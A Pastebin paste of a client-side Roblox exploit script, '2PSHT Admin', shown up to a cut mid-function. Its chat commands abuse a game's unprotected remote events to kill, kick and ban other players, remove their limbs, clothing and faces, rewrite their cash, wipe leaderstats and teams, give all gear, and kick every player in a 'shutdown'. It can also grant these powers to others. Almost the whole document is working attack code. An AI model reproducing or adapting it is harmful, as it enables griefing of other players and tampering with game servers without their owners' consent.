Advertisement
Runixer

Untitled

Jan 13th, 2020
23,559
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 70.49 KB | None | 0 0
  1. Prefix = ":"
  2.  
  3. if #Prefix > 4 or #Prefix < 0 then
  4. Prefix = ":"
  5. end
  6.  
  7. administrators = {}
  8. moderators = {}
  9. banned = {}
  10. loopkilled = {}
  11. toolbanned = {}
  12.  
  13. example = "Uctron"
  14. playersService = game:GetService("Players")
  15. replicatedStorage = game:GetService("ReplicatedStorage")
  16. starterGui = game:GetService("StarterGui")
  17. coreGui = game:GetService("CoreGui")
  18. runService = game:GetService("RunService")
  19. localPlayer = playersService.LocalPlayer
  20. createCommand = localPlayer.Chatted
  21. Notification1 = Instance.new("Sound", coreGui)
  22. Notification2 = Instance.new("Sound", coreGui)
  23. Notification3 = Instance.new("Sound", coreGui)
  24. CommandThemeSong = Instance.new("Sound", coreGui)
  25. Notification1.Name = "2PSHTUAN1"
  26. Notification2.Name = "2PSHTUAN2"
  27. Notification3.Name = "2PSHTUAN3"
  28. CommandThemeSong.Name = "2PSHTUANCTS"
  29. Notification1.SoundId = "rbxassetid://523194796"
  30. Notification2.SoundId = "rbxassetid://232127604"
  31. Notification3.SoundId = "rbxassetid://1000294392"
  32. Notification3.Volume = Notification3.Volume / 2
  33. CommandThemeSong.SoundId = "rbxassetid://1836975833"
  34. CommandThemeSong.Volume = CommandThemeSong.Volume / 3
  35. Uctron = {}
  36. Uctron.SoundFX = {
  37.  
  38. _notification1=0;
  39. _notification2=1;
  40. _notification3=2;
  41. _commandthemesong=3;
  42.  
  43. }
  44.  
  45. Uctron.Settings = {
  46.  
  47. _prefix=0;
  48. _example=1;
  49.  
  50. }
  51.  
  52. Uctron.Data = {_localPlayer=0}
  53.  
  54. Uctron.Settings._example = example
  55. Uctron.Data._localPlayer = localPlayer
  56. Uctron.SoundFX._notification1 = Notification1
  57. Uctron.SoundFX._notification2 = Notification2
  58. Uctron.SoundFX._notification3 = Notification3
  59. Uctron.SoundFX._commandthemesong = CommandThemeSong
  60.  
  61. function GetPlayer(String)
  62. local Found = {}
  63. local strl = String:lower()
  64. if strl == "all" then
  65. for i,v in pairs(playersService:GetPlayers()) do
  66. table.insert(Found,v.Name)
  67. end
  68. elseif strl == "others" then
  69. for i,v in pairs(playersService:GetPlayers()) do
  70. if v.Name ~= Uctron.Data._localPlayer.Name then
  71. table.insert(Found,v.Name)
  72. end
  73. end
  74. elseif strl == "me" then
  75. for i,v in pairs(playersService:GetPlayers()) do
  76. if v.Name == Uctron.Data._localPlayer.Name then
  77. table.insert(Found,v.Name)
  78. end
  79. end
  80. else
  81. for i,v in pairs(playersService:GetPlayers()) do
  82. if v.Name:lower():sub(1, #String) == String:lower() then
  83. table.insert(Found,v.Name)
  84. end
  85. end
  86. end
  87. return Found
  88. end
  89.  
  90. createCommand:Connect(function(msg)
  91. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."kill " then
  92. for i,v in pairs(GetPlayer(string.sub(msg,6+Prefix:len()))) do
  93. if playersService[v].Character.Torso:FindFirstChild("Neck") then
  94. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Torso.Neck)
  95. end
  96. runService.RenderStepped:Wait()
  97. end
  98. end
  99. end)
  100.  
  101. createCommand:Connect(function(msg)
  102. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."kick " then
  103. for i,v in pairs(GetPlayer(string.sub(msg,6+Prefix:len()))) do
  104. if playersService:FindFirstChild(v) then
  105. replicatedStorage.events.destroyObject:FireServer(playersService[v])
  106. end
  107. end
  108. end
  109. end)
  110.  
  111. createCommand:Connect(function(msg)
  112. if msg:lower():sub(1,4+Prefix:len()) == Prefix.."ban " then
  113. for i,v in pairs(GetPlayer(string.sub(msg,5+Prefix:len()))) do
  114. --if v:lower() ~= "all" or v:lower() ~= "others" then
  115. table.insert(banned,playersService[v].Name)
  116. --[[else
  117. Uctron.SoundFX._notification3:Play()
  118. starterGui:SetCore("SendNotification", {
  119. Title = "2PSHT Admin | Error";
  120. Text = "Even though you are the owner of this script, banning more than one person is not allowed due to abuse. Please ban someone one at a time. Command not executed.";
  121. Icon = "rbxassetid://4595715410";
  122. Duration = 15;
  123. Button1 = "Okay";
  124. })
  125. end]]
  126. end
  127. end
  128. end)
  129.  
  130. createCommand:Connect(function(msg)
  131. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."unban " then
  132. a = string.sub(msg,Prefix:len()+7)
  133. for j,k in pairs(banned) do
  134. if string.match(k,a) then
  135. table.remove(banned,j)
  136. end
  137. end
  138. end
  139. end)
  140.  
  141. createCommand:Connect(function(msg)
  142. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."toolban " then
  143. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  144. table.insert(toolbanned,playersService[v].Name)
  145. end
  146. end
  147. end)
  148.  
  149. createCommand:Connect(function(msg)
  150. if msg:lower():sub(1,10+Prefix:len()) == Prefix.."untoolban " then
  151. for i,v in pairs(GetPlayer(string.sub(msg,11+Prefix:len()))) do
  152. for j,k in pairs(toolbanned) do
  153. if string.match(k,v) then
  154. table.remove(toolbanned,j)
  155. end
  156. end
  157. end
  158. end
  159. end)
  160.  
  161. createCommand:Connect(function(msg)
  162. if msg:lower():sub(1,9+Prefix:len()) == Prefix.."loopkill " then
  163. for i,v in pairs(GetPlayer(string.sub(msg,10+Prefix:len()))) do
  164. table.insert(loopkilled,playersService[v].Name)
  165. end
  166. end
  167. end)
  168.  
  169. createCommand:Connect(function(msg)
  170. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."unloopkill " then
  171. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  172. for j,k in pairs(loopkilled) do
  173. if string.match(k,v) then
  174. table.remove(loopkilled,j)
  175. end
  176. end
  177. end
  178. end
  179. end)
  180.  
  181. createCommand:Connect(function(msg)
  182. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."cash " then
  183. for i,v in pairs(GetPlayer(string.split(msg, " ")[2])) do
  184. b = string.split(msg, " ")[3]
  185. game:GetService("ReplicatedStorage").Events.changeValue:InvokeServer(game:GetService('ReplicatedStorage').plrData[v].cash, b)
  186. end
  187. end
  188. end)
  189.  
  190. createCommand:Connect(function(msg)
  191. if msg:lower():sub(1,10+Prefix:len()) == Prefix.."unpackage " then
  192. for i,v in pairs(GetPlayer(string.sub(msg,11+Prefix:len()))) do
  193. for x,o in pairs(playersService[v].Character:GetChildren()) do
  194. if o:IsA("CharacterMesh") then
  195. replicatedStorage.events.destroyObject:FireServer(o)
  196. end
  197. end
  198. end
  199. end
  200. end)
  201.  
  202. createCommand:Connect(function(msg)
  203. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."rlimbs " then
  204. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  205. if playersService[v].Character:FindFirstChild("Left Arm") then
  206. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  207. end
  208. if playersService[v].Character:FindFirstChild("Right Arm") then
  209. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  210. end
  211. if playersService[v].Character:FindFirstChild("Left Leg") then
  212. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  213. end
  214. if playersService[v].Character:FindFirstChild("Right Leg") then
  215. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  216. end
  217. end
  218. end
  219. end)
  220.  
  221. createCommand:Connect(function(msg)
  222. if msg:lower():sub(1,12+Prefix:len()) == Prefix.."removelimbs " then
  223. for i,v in pairs(GetPlayer(string.sub(msg,13+Prefix:len()))) do
  224. if playersService[v].Character:FindFirstChild("Left Arm") then
  225. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  226. end
  227. if playersService[v].Character:FindFirstChild("Right Arm") then
  228. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  229. end
  230. if playersService[v].Character:FindFirstChild("Left Leg") then
  231. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  232. end
  233. if playersService[v].Character:FindFirstChild("Right Leg") then
  234. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  235. end
  236. end
  237. end
  238. end)
  239.  
  240. createCommand:Connect(function(msg)
  241. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rarms " then
  242. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  243. if playersService[v].Character:FindFirstChild("Left Arm") then
  244. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  245. end
  246. if playersService[v].Character:FindFirstChild("Left Arm") then
  247. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  248. end
  249. end
  250. end
  251. end)
  252.  
  253. createCommand:Connect(function(msg)
  254. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removearms " then
  255. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  256. if playersService[v].Character:FindFirstChild("Left Arm") then
  257. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  258. end
  259. if playersService[v].Character:FindFirstChild("Left Arm") then
  260. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  261. end
  262. end
  263. end
  264. end)
  265.  
  266. createCommand:Connect(function(msg)
  267. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rlegs " then
  268. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  269. if playersService[v].Character:FindFirstChild("Left Leg") then
  270. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  271. end
  272. if playersService[v].Character:FindFirstChild("Right Leg") then
  273. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  274. end
  275. end
  276. end
  277. end)
  278.  
  279. createCommand:Connect(function(msg)
  280. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removelegs " then
  281. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  282. if playersService[v].Character:FindFirstChild("Left Leg") then
  283. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  284. end
  285. if playersService[v].Character:FindFirstChild("Right Leg") then
  286. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  287. end
  288. end
  289. end
  290. end)
  291.  
  292. createCommand:Connect(function(msg)
  293. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."punish " then
  294. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  295. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character)
  296. end
  297. end
  298. end)
  299.  
  300. createCommand:Connect(function(msg)
  301. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."naked " then
  302. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  303. if playersService[v].Character:FindFirstChild("Shirt") then
  304. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Shirt)
  305. else
  306. end
  307. if playersService[v].Character:FindFirstChild("Pants") then
  308. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Pants)
  309. else
  310. end
  311. if playersService[v].Character:FindFirstChild("Shirt Graphic") then
  312. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Shirt Graphic"])
  313. else
  314. end
  315. end
  316. end
  317. end)
  318.  
  319. createCommand:Connect(function(msg)
  320. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."nayked " then
  321. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  322. if playersService[v].Character:FindFirstChild("Shirt") then
  323. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Shirt)
  324. else
  325. end
  326. if playersService[v].Character:FindFirstChild("Pants") then
  327. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Pants)
  328. else
  329. end
  330. if playersService[v].Character:FindFirstChild("Shirt Graphic") then
  331. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Shirt Graphic"])
  332. else
  333. end
  334. end
  335. end
  336. end)
  337.  
  338. createCommand:Connect(function(msg)
  339. if msg:lower():sub(1,9+Prefix:len()) == Prefix.."faceless " then
  340. for i,v in pairs(GetPlayer(string.sub(msg,10+Prefix:len()))) do
  341. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  342. end
  343. end
  344. end)
  345.  
  346. createCommand:Connect(function(msg)
  347. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rface " then
  348. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  349. if Uctron.Data._localPlayer.Character.Head:FindFirstChild("face") then
  350. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  351. end
  352. end
  353. end
  354. end)
  355.  
  356. createCommand:Connect(function(msg)
  357. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removeface " then
  358. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  359. if Uctron.Data._localPlayer.Character.Head:FindFirstChild("face") then
  360. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head:FindFirstChildOfClass("Decal"))
  361. end
  362. end
  363. end
  364. end)
  365.  
  366. createCommand:Connect(function(msg)
  367. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rhats " then
  368. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  369. for x,o in pairs(playersService[v].Character:GetChildren()) do
  370. if o:IsA("Accessory") then
  371. replicatedStorage.events.destroyObject:FireServer(o)
  372. end
  373. end
  374. end
  375. end
  376. end)
  377.  
  378. createCommand:Connect(function(msg)
  379. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removehats " then
  380. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  381. for x,o in pairs(playersService[v].Character:GetChildren()) do
  382. if o:IsA("Accessory") then
  383. replicatedStorage.events.destroyObject:FireServer(o)
  384. end
  385. end
  386. end
  387. end
  388. end)
  389.  
  390. createCommand:Connect(function(msg)
  391. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."creeper " then
  392. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  393. if playersService[v].Character.Head:FindFirstChild("Mesh") then
  394. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Head.Mesh)
  395. end
  396. if playersService[v].Character:FindFirstChild("Left Arm") then
  397. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  398. end
  399. if playersService[v].Character:FindFirstChild("Right Arm") then
  400. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  401. end
  402. end
  403. end
  404. end)
  405.  
  406. createCommand:Connect(function(msg)
  407. if msg:lower():sub(1,8+Prefix:len()) == Prefix.."ragdoll " then
  408. for i,v in pairs(GetPlayer(string.sub(msg,9+Prefix:len()))) do
  409. if playersService[v].Character:FindFirstChild("Humanoid") then
  410. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Humanoid)
  411. end
  412. end
  413. end
  414. end)
  415.  
  416. createCommand:Connect(function(msg)
  417. if msg:lower() == Prefix.."clearteams" then
  418. for i,v in pairs(game.Teams:GetChildren()) do
  419. replicatedStorage.events.destroyObject:FireServer(v)
  420. end
  421. end
  422. end)
  423.  
  424. createCommand:Connect(function(msg)
  425. if msg:lower() == Prefix.."cteams" then
  426. for i,v in pairs(game.Teams:GetChildren()) do
  427. replicatedStorage.events.destroyObject:FireServer(v)
  428. end
  429. end
  430. end)
  431.  
  432.  
  433. createCommand:Connect(function(msg)
  434. if msg:lower() == Prefix.."ccash" then
  435. for i,v in pairs(playersService:GetPlayers()) do
  436. if v:FindFirstChild("leaderstats") then
  437. replicatedStorage.events.destroyObject:FireServer(v.leaderstats)
  438. end
  439. end
  440. end
  441. end)
  442.  
  443. createCommand:Connect(function(msg)
  444. if msg:lower() == Prefix.."clearcash" then
  445. for i,v in pairs(playersService:GetPlayers()) do
  446. if v:FindFirstChild("leaderstats") then
  447. replicatedStorage.events.destroyObject:FireServer(v.leaderstats)
  448. end
  449. end
  450. end
  451. end)
  452.  
  453. createCommand:Connect(function(msg)
  454. if msg:lower() == Prefix.."clear" then
  455. for i,v in pairs(workspace:GetChildren()) do
  456. if v:IsA("Accessory") or v:IsA("Hat") or v:IsA("Tool") then
  457. replicatedStorage.events.destroyObject:FireServer(v)
  458. end
  459. end
  460. for i,v in pairs(workspace.Terrain:GetChildren()) do
  461. if v:IsA("Accessory") or v:IsA("Hat") or v:IsA("Tool") then
  462. replicatedStorage.events.destroyObject:FireServer(v)
  463. end
  464. end
  465. end
  466. end)
  467.  
  468. -----Commands-----
  469.  
  470. createCommand:Connect(function(msg)
  471. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."goto " then
  472. for i,v in pairs(GetPlayer(string.sub(msg,6+Prefix:len()))) do
  473. Uctron.Data._localPlayer.Character.HumanoidRootPart.CFrame = playersService[v].Character.HumanoidRootPart.CFrame
  474. end
  475. end
  476. end)
  477.  
  478. createCommand:Connect(function(msg)
  479. if msg:lower():sub(1,3+Prefix:len()) == Prefix.."to " then
  480. for i,v in pairs(GetPlayer(string.sub(msg,4+Prefix:len()))) do
  481. Uctron.Data._localPlayer.Character.HumanoidRootPart.CFrame = playersService[v].Character.HumanoidRootPart.CFrame
  482. end
  483. end
  484. end)
  485.  
  486. createCommand:Connect(function(msg)
  487. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."handto " then
  488. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  489. Uctron.Data._localPlayer.Character.HumanoidRootPart.CFrame = playersService[v].Character.HumanoidRootPart.CFrame
  490. end
  491. end
  492. end)
  493.  
  494. createCommand:Connect(function(msg)
  495. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."tp me " then
  496. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  497. Uctron.Data._localPlayer.Character.HumanoidRootPart.CFrame = playersService[v].Character.HumanoidRootPart.CFrame
  498. end
  499. end
  500. end)
  501.  
  502. createCommand:Connect(function(msg)
  503. if msg:lower():sub(1,12+Prefix:len()) == Prefix.."teleport me " then
  504. for i,v in pairs(GetPlayer(string.sub(msg,13+Prefix:len()))) do
  505. Uctron.Data._localPlayer.Character.HumanoidRootPart.CFrame = playersService[v].Character.HumanoidRootPart.CFrame
  506. end
  507. end
  508. end)
  509.  
  510. createCommand:Connect(function(msg)
  511. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."shout " then
  512. local Shout = msg:sub(7+Prefix:len(), #msg)
  513. replicatedStorage.Events.changeValue:InvokeServer(Uctron.Data._localPlayer.Shouts, 1e10)
  514. replicatedStorage.Events.Shout:InvokeServer(Shout)
  515. end
  516. end)
  517.  
  518. createCommand:Connect(function(msg)
  519. if msg:lower():sub(1,3+Prefix:len()) == Prefix.."cm " then
  520. local ChatMessage = msg:sub(4+Prefix:len(), #msg)
  521. replicatedStorage.Events.changeValue:InvokeServer(Uctron.Data._localPlayer.Shouts, 1e10)
  522. replicatedStorage.Events.Shout:InvokeServer(string.rep("\n",53)..ChatMessage)
  523. end
  524. end)
  525.  
  526. createCommand:Connect(function(msg)
  527. if msg:lower():sub(1,9+Prefix:len()) == Prefix.."cmessage " then
  528. local ChatMessage = msg:sub(10+Prefix:len(), #msg)
  529. replicatedStorage.Events.changeValue:InvokeServer(Uctron.Data._localPlayer.Shouts, 1e10)
  530. replicatedStorage.Events.Shout:InvokeServer(string.rep("\n",53)..ChatMessage)
  531. end
  532. end)
  533.  
  534. createCommand:Connect(function(msg)
  535. if msg:lower():sub(1,12+Prefix:len()) == Prefix.."chatmessage " then
  536. local ChatMessage = msg:sub(13+Prefix:len(), #msg)
  537. replicatedStorage.Events.changeValue:InvokeServer(Uctron.Data._localPlayer.Shouts, 1e10)
  538. replicatedStorage.Events.Shout:InvokeServer(string.rep("\n",53)..ChatMessage)
  539. end
  540. end)
  541.  
  542. createCommand:Connect(function(msg)
  543. if msg:lower() == Prefix.."shutdown" then
  544. for _,__ in pairs(playersService:GetPlayers()) do
  545. replicatedStorage.events.destroyObject:FireServer(__)
  546. end
  547. end
  548. end)
  549.  
  550. createCommand:Connect(function(msg)
  551. if msg:lower() == Prefix.."givegears" then
  552. for i,v in pairs(replicatedStorage["BoxItems"]:GetChildren()) do
  553. if v:IsA("Tool") then
  554. replicatedStorage.Events.CrateClaim:FireServer("Gear",v)
  555. end
  556. end
  557. for i,v in pairs(game.Lighting:GetDescendants()) do
  558. if v:IsA("Tool") then
  559. replicatedStorage.Events.CrateClaim:FireServer("Gear",v)
  560. end
  561. end
  562. end
  563. end)
  564.  
  565. createCommand:Connect(function(msg)
  566. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."prefix " then
  567. local PrefixChange = msg:sub(8+Prefix:len(), #msg)
  568. if #PrefixChange > 4 then
  569. starterGui:SetCore("SendNotification", {
  570. Title = "2PSHT Admin | Error";
  571. Text = "Prefix has to be be at most 4 characters. Now setting prefix to \":\"";
  572. Icon = "rbxassetid://4595715410";
  573. Duration = 15;
  574. Button1 = "Okay";
  575. })
  576. Uctron.SoundFX._notification3:Play()
  577. Prefix = ":"
  578. elseif #PrefixChange < 0 then
  579. starterGui:SetCore("SendNotification", {
  580. Title = "2PSHT Admin | Error";
  581. Text = "Prefix has to be be at least 0 characters. Now setting prefix to \":\"";
  582. Icon = "rbxassetid://4595715410";
  583. Duration = 15;
  584. Button1 = "Okay";
  585. })
  586. Uctron.SoundFX._notification3:Play()
  587. Prefix = ":"
  588. else
  589. Uctron.SoundFX._notification1:Play()
  590. Prefix = PrefixChange
  591. starterGui:SetCore("SendNotification", {
  592. Title = "2PSHT Admin | Success";
  593. Text = "The 2PSHT Admin prefix has been set to \""..Prefix.."\".";
  594. Icon = "rbxassetid://4595715410";
  595. Duration = 15;
  596. Button1 = "Okay";
  597. })
  598. end
  599. end
  600. end)
  601.  
  602. createCommand:Connect(function(msg)
  603. if msg:lower() == Prefix.."cmds" or msg:lower() == Prefix.."commands" then
  604. Uctron.SoundFX._notification2:Play()
  605. Site = "https://pastebin.com/raw/Wyp85zcp"
  606. site = string.gsub(string.gsub(Site,"/","\\"),":\\\\","://").."?www.roblox.com"
  607. game.GuiService:OpenBrowserWindow(site)
  608. wait(2)
  609. Uctron.SoundFX._commandthemesong:Play()
  610. game.GuiService.BrowserWindowClosed:Wait()
  611. Uctron.SoundFX._commandthemesong:Stop()
  612. end
  613. end)
  614.  
  615. createCommand:Connect(function(msg)
  616. if msg:lower():sub(1,4+Prefix:len()) == Prefix.."mod " then
  617. for i,v in pairs(GetPlayer(string.sub(msg,5+Prefix:len()))) do
  618. if playersService:FindFirstChild(v) then
  619. table.insert(moderators,playersService[v].Name)
  620. Uctron.SoundFX._notification1:Play()
  621. starterGui:SetCore("SendNotification", {
  622. Title = "2PSHT Admin | Success";
  623. Text = "Moderator powers given to \""..v.."\".";
  624. Icon = "rbxassetid://4595715410";
  625. Duration = 15;
  626. Button1 = "Okay";
  627. })
  628. Command1 = playersService[v].Chatted:Connect(function(msg)
  629. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."kill " then
  630. for i,v in pairs(GetPlayer(string.sub(msg,6+Prefix:len()))) do
  631. if playersService[v].Character.Torso:FindFirstChild("Neck") then
  632. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Torso.Neck)
  633. end
  634. runService.RenderStepped:Wait()
  635. end
  636. end
  637. end)
  638.  
  639. Command2 = playersService[v].Chatted:Connect(function(msg)
  640. if msg:lower():sub(1,5+Prefix:len()) == Prefix.."cash " then
  641. for i,v in pairs(GetPlayer(string.split(msg, " ")[2])) do
  642. b = string.split(msg, " ")[3]
  643. game:GetService("ReplicatedStorage").Events.changeValue:InvokeServer(game:GetService('ReplicatedStorage').plrData[v].cash, b)
  644. end
  645. end
  646. end)
  647.  
  648. Command3 = playersService[v].Chatted:Connect(function(msg)
  649. if msg:lower():sub(1,10+Prefix:len()) == Prefix.."unpackage " then
  650. for i,v in pairs(GetPlayer(string.sub(msg,11+Prefix:len()))) do
  651. for x,o in pairs(playersService[v].Character:GetChildren()) do
  652. if o:IsA("CharacterMesh") then
  653. replicatedStorage.events.destroyObject:FireServer(o)
  654. end
  655. end
  656. end
  657. end
  658. end)
  659.  
  660. Command4 = playersService[v].Chatted:Connect(function(msg)
  661. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."rlimbs " then
  662. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  663. if playersService[v].Character:FindFirstChild("Left Arm") then
  664. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  665. end
  666. if playersService[v].Character:FindFirstChild("Right Arm") then
  667. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  668. end
  669. if playersService[v].Character:FindFirstChild("Left Leg") then
  670. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  671. end
  672. if playersService[v].Character:FindFirstChild("Right Leg") then
  673. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  674. end
  675. end
  676. end
  677. end)
  678.  
  679. Command5 = playersService[v].Chatted:Connect(function(msg)
  680. if msg:lower():sub(1,12+Prefix:len()) == Prefix.."removelimbs " then
  681. for i,v in pairs(GetPlayer(string.sub(msg,13+Prefix:len()))) do
  682. if playersService[v].Character:FindFirstChild("Left Arm") then
  683. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  684. end
  685. if playersService[v].Character:FindFirstChild("Right Arm") then
  686. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  687. end
  688. if playersService[v].Character:FindFirstChild("Left Leg") then
  689. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  690. end
  691. if playersService[v].Character:FindFirstChild("Right Leg") then
  692. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  693. end
  694. end
  695. end
  696. end)
  697.  
  698. Command6 = playersService[v].Chatted:Connect(function(msg)
  699. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rarms " then
  700. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  701. if playersService[v].Character:FindFirstChild("Left Arm") then
  702. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  703. end
  704. if playersService[v].Character:FindFirstChild("Left Arm") then
  705. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  706. end
  707. end
  708. end
  709. end)
  710.  
  711. Command7 = playersService[v].Chatted:Connect(function(msg)
  712. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removearms " then
  713. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  714. if playersService[v].Character:FindFirstChild("Left Arm") then
  715. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Arm"])
  716. end
  717. if playersService[v].Character:FindFirstChild("Left Arm") then
  718. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Arm"])
  719. end
  720. end
  721. end
  722. end)
  723.  
  724. Command8 = playersService[v].Chatted:Connect(function(msg)
  725. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."rlegs " then
  726. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  727. if playersService[v].Character:FindFirstChild("Left Leg") then
  728. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  729. end
  730. if playersService[v].Character:FindFirstChild("Right Leg") then
  731. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  732. end
  733. end
  734. end
  735. end)
  736.  
  737. Command9 = playersService[v].Chatted:Connect(function(msg)
  738. if msg:lower():sub(1,11+Prefix:len()) == Prefix.."removelegs " then
  739. for i,v in pairs(GetPlayer(string.sub(msg,12+Prefix:len()))) do
  740. if playersService[v].Character:FindFirstChild("Left Leg") then
  741. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Left Leg"])
  742. end
  743. if playersService[v].Character:FindFirstChild("Right Leg") then
  744. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Right Leg"])
  745. end
  746. end
  747. end
  748. end)
  749.  
  750. Command10 = playersService[v].Chatted:Connect(function(msg)
  751. if msg:lower():sub(1,6+Prefix:len()) == Prefix.."naked " then
  752. for i,v in pairs(GetPlayer(string.sub(msg,7+Prefix:len()))) do
  753. if playersService[v].Character:FindFirstChild("Shirt") then
  754. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Shirt)
  755. else
  756. end
  757. if playersService[v].Character:FindFirstChild("Pants") then
  758. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Pants)
  759. else
  760. end
  761. if playersService[v].Character:FindFirstChild("Shirt Graphic") then
  762. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character["Shirt Graphic"])
  763. else
  764. end
  765. end
  766. end
  767. end)
  768.  
  769. Command11 = playersService[v].Chatted:Connect(function(msg)
  770. if msg:lower():sub(1,7+Prefix:len()) == Prefix.."nayked " then
  771. for i,v in pairs(GetPlayer(string.sub(msg,8+Prefix:len()))) do
  772. if playersService[v].Character:FindFirstChild("Shirt") then
  773. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Shirt)
  774. else
  775. end
  776. if playersService[v].Character:FindFirstChild("Pants") then
  777. replicatedStorage.events.destroyObject:FireServer(playersService[v].Character.Pants)
  778. else
  779. end
  780. if playersService[v].Character:FindFirstChild("Shirt Graphic") then
